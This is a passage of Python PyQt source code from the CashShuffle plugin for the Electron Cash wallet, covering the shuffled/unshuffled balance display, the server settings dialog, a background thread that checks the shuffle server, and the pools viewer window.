l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: GUI refresh() wil later also set this string but we set it immediately here so UI feel peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limied. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one o the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # slot won't get called from setting radio buttons programmaticallys, so we force-call the slot
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstrat Base class -- do not instantiate this as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab which interit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed' means connecton failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Electron Cash is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.statusChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Electron Cash codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " BCH",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances timer will not fire after object deletion due to PyQt5 singal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
